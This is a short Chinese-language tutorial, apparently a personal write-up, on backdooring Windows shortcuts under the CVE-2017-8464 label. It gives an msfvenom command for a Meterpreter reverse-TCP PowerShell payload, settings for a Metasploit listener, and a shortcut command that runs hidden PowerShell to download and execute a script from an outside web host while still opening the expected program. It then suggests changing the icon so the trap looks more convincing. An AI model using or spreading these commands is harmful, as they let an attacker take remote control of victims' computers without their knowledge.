0x00
CVE-2017-8464 个人利用小姿势
0x01 首先用MSF生成一个payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f psh-reflection >shell.ps1生成以后,把shell.ps1放到网站上。
0x02 msf设置监听payload
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 1.1.1.1
set LPORT 443
0x03 建立lnk后门
新建一个快捷方式,路径输入以下命令,后面的start c:\1.exe 可以换成正常的程序。
比如:目标机上桌面有个excel的快捷方式,假设excel程序的路径为c:\excel.exe
那么我们可以修改他这个快捷方式为以下命令,后面加上&start c:\excel.exe
这样当目标打开excel快捷方式的时候,会下载运行我们的后门,并且excel也能正常打开。
cmd.exe /c start /min powershell -w hidden ""IEX (New-Object Net.WebClient).DownloadString('http://www.xxxx.com/shell.ps1'); ""&start c:\1.exe
0x04 修改lnk图标
你可以右键,为你的lnk后门修改图标,使其更具有迷惑性。
系统图标路径如下;
%systemroot%\system32\shell32.dll